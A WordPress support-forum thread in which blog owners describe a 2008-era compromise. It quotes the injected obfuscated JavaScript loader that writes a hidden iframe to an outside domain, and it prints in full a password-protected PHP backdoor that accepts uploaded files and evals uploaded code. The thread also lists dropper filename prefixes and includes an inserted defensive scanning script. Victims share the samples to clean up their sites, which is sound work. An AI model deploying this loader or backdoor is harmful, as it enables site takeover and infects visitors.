• hi,
    the following script had been inserted to my blog:

    <?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?><?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>

    After the insertion my website only displayed a white screen and a popup to run ActiveX was appearing. In the left bottom of the browser I was seeing a weird link saying: https://www.wp-stats-php.info/iframe/wp-stats.php
    I opened the source file and I saw that the script is found on the top and the bottom.
    I checked all my theme php files and the script was also there and on my config.php, index.php too so I deleted the script from every file where it was inserted. The problem was solved.

    NOW THE QUESTION IS HOW WAS THIS SCRIPT INSERTED AND HOW CAN IT BE AVOIDED?

    I am using wordpress 2.5 with the following plugins:
    -scf2-contact-form
    -simplemodal-contact-form-smcf
    -ibox
    -dailytop10

    thanks in advance for any clarification

Viewing 12 replies - 46 through 57 (of 57 total)
  • Are you kidding? You are seriously saying that I should ignore what you actually say and try to imagine what you are thinking instead?

    yes, actually I am, because that’s what communication is. If I were to intentionally nit-pick everything you’ve written looking for double-meanings and unintended loopholes to exploit, we’d be here all day error-checking our writing instead of getting on with business.

    Come to think of it, it’s now painfully obvious why you’re being such an insufferable pain in the ass about all this. Unfortunately you’re also being hypocritical because your language suffers the same lack of accuracy mine does (only you seem proud of it).

    case in point:

    Yes, and…? If A is a kind of B, that doesn’t mean that A is the same as B.

    Actually, it means that B *is* the same as A, for the broader definition that A brings with it. Get it right.

    If you have a basket of apples, and one of them is red… they’re all still apples. Even the red one.

    Please, nit-picking is for apes… I have no interest in it, so why not just go fix your busted wordpress as this discussion certainly isn’t going to do it.

    elorgwhee, consider taking your media off the server (that is, only the media files in your uploads directory structure), then just rm -rf the whole lot.

    … you likely have a local copy of your theme already, and you’ll have to reload plugins and such anyway…

    just a thought.

    Yeah, I’ve considered that. It’s really tempting. But I have a bit of custom code that was affected as well – so there’s no reinstalling it. I’d have to hope that my latest backup captured any of my recent updates to it.

    Maybe I’ll just do that for wordpress and vanilla for now so at least those parts don’t continue to crash people’s computers. lol

    Or maybe I can just cut over to the new site without any templates or plugins. It won’t be pretty, but it would work for now.. *rubs chin*

    as one moon-face to another, I implore you to reconsider any prolonged chin-abrasion

    edit: I apologise, I just realised that it’s only me who finds myself funny when I haven’t had any sleep…. and with that, I’m out

    good luck with the recovery.

    Ivovic,

    I notice that you have now completely dropped the substantive argument about PHP’s security, and are trying to change the subject to some meta-rhetorical waffle. This doesn’t really surprise me, changing the subject is a common (if rather lame) way to avoid losing a debate.

    Even though I think your meta-rhetorical waffle is at least as specious as your opinions on programming language security, I came here to discuss the former, not the latter.

    Since you’ve dropped the subject I’m interested in, I think we are done.

    I’ll get the light…

    (click)

    I got hacked, too. I just joined this site, and before I get flamed for being another guy who joined only when he got hacked, let me say it’s because I’ve been a happy camper with WordPress for almost 2 years. It’s done everything I asked and easily enough, so I just had no reason to search for more things to read. Sorry.

    Every one of my php and htm files got hacked with the script zikzak shows.
    How can I prevent it again?
    How can I fix my broken blogs? (can I just point to the still-good sql from a new installation and throw away the code in the old?) How would I do this?
    How do I punish the fuckers who did this? I want thumb screws and cat-o-nine-tails

    Thanks ever so much,
    Martin

    My site was hacked as well. Any chance this thread can re-evolve from bickering to helping everyone figure out the cause?

    I have the affected script attached to all my files…and although I didn’t find anything tagged with pre_ in front of the filename, I did find that hello.php in my plugins directory was copied to ext_hello.php with some funky code in it.

    I have no idea how these guys got in, or how they destroyed my site. Any chance anyone has any ideas before I wipe it and start all over?

    Thanks everyone.

    I also got hacked and I had some custom code that wasn’t backed up recently, so I have to find the infected bits and clean it out.

    I have started comparing the hacked website with backup copies using a folder compare application. Then I compare any suspect files using an app for finding text differences. So far I have only found the code already posted here and a directory with 71 casino html-pages.

    In my case they used lib_ as a prefix on the files containing this:

    <?php
    @error_reporting(E_ALL);
    @set_time_limit(0);
    global $HTTP_SERVER_VARS;
    
    define('PASSWD','c1717aa0da396794f1a340b2ee7678c2');
    
    function say($t) {
      echo "$t\n";
    };
    
    function testdata($t) {
      say(md5("mark_$t"));
    };
    
    echo "<pre>";
    testdata('start');
    if (md5($_POST["p"]) == PASSWD) {
      if ($code = @fread(@fopen($HTTP_POST_FILES["s"]["tmp_name"], "rb"),
        $HTTP_POST_FILES["s"]["size"])) {
          if(@fwrite(@fopen(dirname(__FILE__).'/'.basename($HTTP_POST_FILES["s"]["name"]), "wb"), $code))
          {
          testdata('save_ok');
          };
          //eval($code);
      } else {
        testdata('save_fail');
      };
    
      if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"),
        $HTTP_POST_FILES["f"]["size"]))
      {
          eval($code);
          testdata('ok');
      } else {
        testdata('fail');
      };
    
    } else {
      testdata('pass');
    };
    
    testdata('end');
    echo "</pre>";
    ?>

    Could someone please explain what this code is supposed to do?

    The code responsible for traversing directories and creating files containing the code mentioned above seems to reside in a file named wp-stats.php in the top level of the WordPress install. (If I am not mistaken – I am not a php-programmer)

    It randomly chooses a string to prepend to an existing filename. Prefixes used are ‘lib_’, ‘co_’, ‘pre_’, ‘net_’, ‘func_’, ‘ad_’, ‘ext_’, ‘new_’, ‘old_’, ‘fix_’, ‘fixed_’, ‘na_’, ‘av_’ and ‘fx_’.

    There are some password related functions also.
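
A defensive sweep for the indicators reported in this thread, as an added example that is not part of any poster's message or of WordPress itself: it flags files named with one of the listed prefixes plus the name of a sibling file (as with ext_hello.php beside hello.php) and statically decodes the shift-by-2 string in files carrying the injected loader, without running it. The names `decode`, `scan` and `demo` are hypothetical, the sibling-name heuristic is an assumption, and the test tree is constructed.

```python
import os, re, tempfile

# Prefixes listed in the post above.
PREFIXES = ("lib_", "co_", "pre_", "net_", "func_", "ad_", "ext_", "new_",
            "old_", "fix_", "fixed_", "na_", "av_", "fx_")
# The loader's call site; group 1 is the obfuscated JS string literal.
CALL = re.compile(r'document\.write\(count\("((?:[^"\\]|\\.)*)"\)\)')
SAMPLE = (  # constructed test file: the injected line quoted in the first post
    r'''<?php echo '<script type="text/javascript">function count(str){var res = "";'''
    r'''for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); '''
    r'''res += String.fromCharCode(n - (2)); } return res; }; document.write(count('''
    r'''">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3'''
    r'''\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>''')

def decode(js_literal, shift=2):
    """Undo the \\" escape used in the sample, then subtract `shift` per char."""
    raw = js_literal.replace('\\"', '"')
    return "".join(chr(ord(c) - shift) for c in raw)

def scan(root):
    """Return (dropped, injected): prefixed copies of sibling files, and
    (path, decoded payload) for each file that carries the loader."""
    dropped, injected = [], []
    for d, _, files in os.walk(root):
        names = set(files)
        for f in sorted(files):
            path = os.path.join(d, f)
            if any(f.startswith(p) and f[len(p):] in names for p in PREFIXES):
                dropped.append(path)  # e.g. ext_hello.php next to hello.php
            if f.lower().endswith((".php", ".htm", ".html")):
                with open(path, encoding="latin-1") as fh:
                    text = fh.read()
                m = CALL.search(text)
                if m and "String.fromCharCode(n - (2))" in text:
                    injected.append((path, decode(m.group(1))))
    return dropped, injected

def demo():
    """Build a small constructed tree in a temp dir and scan it."""
    tree = {"index.php": SAMPLE + "<?php /* theme */ ?>",
            "plugins/hello.php": "<?php /* stock plugin */ ?>",
            "plugins/ext_hello.php": "<?php /* placeholder for dropped file */ ?>"}
    with tempfile.TemporaryDirectory() as root:
        os.mkdir(os.path.join(root, "plugins"))
        for rel, body in tree.items():
            with open(os.path.join(root, rel), "w", encoding="latin-1") as fh:
                fh.write(body)
        dropped, injected = scan(root)
        return ([os.path.relpath(p, root) for p in dropped],
                [(os.path.relpath(p, root), s) for p, s in injected])

if __name__ == "__main__":
    print(demo())
```

A prefix match only marks a file for manual review, since a legitimate file can share such a name; compare each hit against a known-good copy before deleting it.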

    Well we’re all learning.
    We just put up a VPS server to control 1 issue of being hosted with other WP blogs that aren’t keeping current and not using security measures.

    Now we’re cleaning a few sites and need some help.

    We have a WordPress MYSQL database that appears to have
    had a SQL injection. We’re attempting to clean the file and have
    a few questions.

    1) Are there any tools available that can scan a
    backup of a MySQL table exported from phpMyAdmin
    and clean out a SQL Injection?

    2) Are there any tools available that can scan an online MySQL
    database and clean out a SQL Injection?

    3) Are there any tools that can detect any other problems
    in regards to a WordPress installation that has been compromised?

    We’re new to this cleanup process and any help at all in
    locating any tools would be greatly appreciated.

    Has anyone come up with a solution to this? I had this very thing happen to me recently. It seems there are a lot of threads like this that go unanswered.

    My files all began with fx_

    How should I check my database to make sure none of this is polluting that as well?

  • The topic ‘got hacked’ is closed to new replies.